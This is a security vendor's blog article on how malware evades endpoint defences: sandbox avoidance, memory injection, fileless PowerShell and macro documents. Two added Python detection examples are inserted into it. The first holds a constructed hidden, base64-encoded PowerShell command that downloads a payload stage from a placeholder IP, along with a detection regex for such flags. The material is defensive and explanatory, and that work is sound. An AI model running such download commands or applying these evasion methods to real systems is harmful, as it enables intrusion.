Chasing malware developers through their cyber rabbit holes might be a fun challenge for security researchers, but for the rest of us, the effectiveness of modern attack methods is frustrating and alarming. Incidents that involved evasive malware, and in particular fileless techniques for bypassing endpoint security measures, were prevalent in 2017. They are set to be even more damaging, costly, and exasperating in 2018.
It’s an old story by now — the more security pros learn about protecting their organizations against malware, the more wily and sophisticated the adversaries get. The adversaries will always have the incentive and the ability to bypass detection-based technologies. In order to protect their nefarious creations (and their investments), attackers will try everything they can in order to evade detection.
The ability of attackers to avoid detection isn’t as simple as it sounds when an entire world’s worth of security experts, artificial intelligence systems, and endpoint protection software vendors are focused on catching them. And the stakes are getting higher. Experts predict that this year, state-sponsored hackers, hacktivists, and crime syndicates will leverage and target major events like the Olympics and U.S. midterm elections. Even more alarming, it is expected that ransomware attacks on hospitals and IoT devices will turn deadly, as attackers extort money and power by hijacking control of pacemakers and other critical equipment.
Malware developers use a number of techniques to ensure that their malicious code runs even on endpoints that use a variety of products dedicated to identifying, detecting, and eradicating malware. These techniques are well documented, can be understood by day-to-day attackers, and are increasingly offered as an easy-to-deploy service by cybercrime syndicates. Common evasive techniques include:
Refusing to Infect in “Hostile” Environments
Malware developers want to avoid having their code fingerprinted, which subsequently makes their malware known to antivirus solutions (and therefore readily blocked). Such malicious software is constructed to avoid virtualization environments, sandboxes, and antivirus solutions by shutting itself down and leaving no trace through artifacts or executed processes.
Using Memory Injection
Malicious code injects itself into trusted processes on the system, abusing the legitimate capabilities of the operating system or software to avoid solutions that look for new and unwanted files and processes. Malicious code is concealed in a file using a packer or other technique, so it arrives looking normal, injects itself into other legitimate applications, and gains a foothold. Such techniques are used in the fileless attacks mentioned above. One of these schemes recently made headlines by targeting organizations providing critical support to the Olympics. The attack combined a phishing email, a weaponized Word file, and a hidden PowerShell script. Using native PowerShell functions to evade pattern-matching solutions and other defenses, attackers are able to establish a link to a remote server, possibly with the intention of downloading more malware.
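The Office-to-PowerShell chain described above is usually visible in endpoint telemetry even when the script itself is never written to disk. The following is an added example, not code from the original article or from any product: it walks constructed process-creation and network events (field names and values are assumptions), pairs each PowerShell process with its parent, decodes an `-Enc` payload, and reports the chain when the parent is an Office application.

```python
import base64
import re

# Constructed sample telemetry (not from a real sensor): parent/child process
# events plus one outbound connection made by the child PowerShell process.
_ENC = base64.b64encode(
    "Invoke-WebRequest http://203.0.113.10/stage".encode("utf-16-le")).decode()
EVENTS = [
    {"type": "process", "pid": 1200, "ppid": 900, "image": "WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"type": "process", "pid": 1300, "ppid": 1200, "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + _ENC},
    {"type": "network", "pid": 1300, "dest": "203.0.113.10", "port": 80},
    # Benign admin script launched from explorer (ppid 700), should not alert.
    {"type": "process", "pid": 1400, "ppid": 700, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Flags commonly paired with hidden, encoded execution.
SUSPICIOUS_FLAGS = re.compile(r"-(enc(odedcommand)?|w(indowstyle)?\s+hidden|nop(rofile)?)\b", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -Enc payload, or None. PowerShell base64-encodes UTF-16LE text."""
    m = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_office_powershell_chains(events):
    """Alert on PowerShell whose parent is an Office app; attach decoded command and connections."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for proc in procs.values():
        parent = procs.get(proc["ppid"])
        if proc["image"].lower() != "powershell.exe" or parent is None:
            continue
        if parent["image"].lower() not in OFFICE_PARENTS:
            continue
        conns = [n["dest"] for n in events if n["type"] == "network" and n["pid"] == proc["pid"]]
        alerts.append({"pid": proc["pid"], "parent": parent["image"],
                       "hidden_or_encoded": bool(SUSPICIOUS_FLAGS.search(proc["cmdline"])),
                       "decoded": decode_encoded_command(proc["cmdline"]),
                       "connections": conns})
    return alerts
```

Because the rule keys on process lineage rather than on the script's bytes, it still fires when the payload is re-encoded or obfuscated, which is the point of pairing baseline AV with evasion-focused controls.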
Using Document Files
Malware hides in documents (Word, Excel, PDF) using macros, website links, and exploits to bypass defenses. This type of attack can also be complex to detect. Consider, for example, a PDF file that contains an embedded Word document, which includes a macro that downloads and executes additional malicious code on an endpoint. These evasive tactics make it difficult for both traditional and next-gen AV solutions to separate malicious from non-malicious files.
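The nested case above (a PDF carrying a Word file that carries a macro) is what defeats scanners that only look at the outer container. As an added example, not code from the original article, the following builds such a sample inline and shows the static triage a defender would apply: pull every `/EmbeddedFile` stream out of the PDF, inflate it, and check whether it is an Office zip containing a `vbaProject.bin` part. The PDF layout handled here is the simple one constructed below; real documents need a full PDF parser.

```python
import io
import re
import zipfile
import zlib


def build_macro_docm():
    """Constructed macro-enabled Word container: an OOXML zip with a vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder, not real VBA")
    return buf.getvalue()


def build_pdf_with_attachment(payload):
    """Constructed minimal PDF whose object 5 is a FlateDecode /EmbeddedFile stream."""
    data = zlib.compress(payload)
    return (b"%PDF-1.7\n1 0 obj << /Type /Catalog /Names << /EmbeddedFiles 4 0 R >> >> endobj\n"
            b"4 0 obj << /Names [(invoice.docm) 5 0 R] >> endobj\n"
            b"5 0 obj << /Type /EmbeddedFile /Filter /FlateDecode /Length "
            + str(len(data)).encode() + b" >>\nstream\n" + data + b"\nendstream\nendobj\n%%EOF\n")


# Dictionary of an /EmbeddedFile object followed by its stream body.
STREAM_RE = re.compile(
    rb"<<(?P<dict>[^>]*?/Type\s*/EmbeddedFile.*?)>>\s*stream\r?\n(?P<body>.*?)\r?\nendstream", re.S)


def extract_embedded_files(pdf):
    """Yield decoded bytes of every /EmbeddedFile stream (FlateDecode or stored raw)."""
    for m in STREAM_RE.finditer(pdf):
        body = m.group("body")
        if b"/FlateDecode" in m.group("dict"):
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue  # corrupt or unsupported filter chain; skip this stream
        yield body


def triage_pdf(pdf):
    """Count embedded files and those that are Office zips carrying a VBA project."""
    findings = {"embedded_files": 0, "office_with_macros": 0}
    for blob in extract_embedded_files(pdf):
        findings["embedded_files"] += 1
        if blob.startswith(b"PK"):
            try:
                with zipfile.ZipFile(io.BytesIO(blob)) as z:
                    if any(n.lower().endswith("vbaproject.bin") for n in z.namelist()):
                        findings["office_with_macros"] += 1
            except zipfile.BadZipFile:
                pass
    return findings
```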
Evasion techniques allow adversaries to get past even modern endpoint security solutions, regardless of whether they’re based on signatures, behavioral monitoring, file reputation, machine learning, or heuristics. Besides being complex and creatively manipulative, these evasion techniques work against even modern AV defenses for several reasons:
- All forms of AV are based, at least to some extent, on historical information (signatures, behavior patterns, etc.), even if this information is used to develop a machine learning model. If there are no fingerprints or historical threat artifacts to “convict” for detection, the malware is invisible to these solutions.
- Malware gets regular updates. The adversaries are motivated to keep their attack tools fresh and unknown.
- Malware is often purpose-built to avoid detection and tested against current implementations of defense solutions. Adversaries ensure that their attacks will be invisible to traditional as well as next-gen AV solutions by devising software that differs from expected patterns and adding combinations of obfuscation tactics.
Evolving Your Endpoint Protection Strategy
Baseline AV products, be they traditional or next gen, play an important role in safeguarding the endpoint, but attackers will always find ways around their detection-based approaches. That’s why such technologies aren’t sufficient by themselves to secure laptops, workstations, servers or other devices in the modern enterprise. To block attacks, security teams need to better understand the mechanics of evasion and the limits of signature, pattern, and behavior-based security solutions.
Mind the gap between your security tools’ ability to detect and block malicious code and the hackers’ ability to evade detection — you can be sure they are well aware of it. Augment baseline AV with anti-evasion solutions designed to stop this kind of malware by blocking its attempts to bypass detection. In other words, focus on breaking or otherwise negating the evasive techniques themselves, rather than solely detecting the malicious software. By “attacking” attempts to evade your security solutions, you will force the adversaries to pick their poison: implement evasion tactics and be stopped because of them, or don’t evade and be stopped by your baseline security controls.
If there is any hope of disarming modern and well-equipped attackers, we have to beat them at their game. Increasingly, that means outmatching them in a battle of wits by devising creative dodges, artful illusions, and cunning counter maneuvers.
About the author: Eddy Bobritsky is Co-Founder and CEO at Minerva Labs, a leading provider of anti-evasion technology for enterprise endpoints.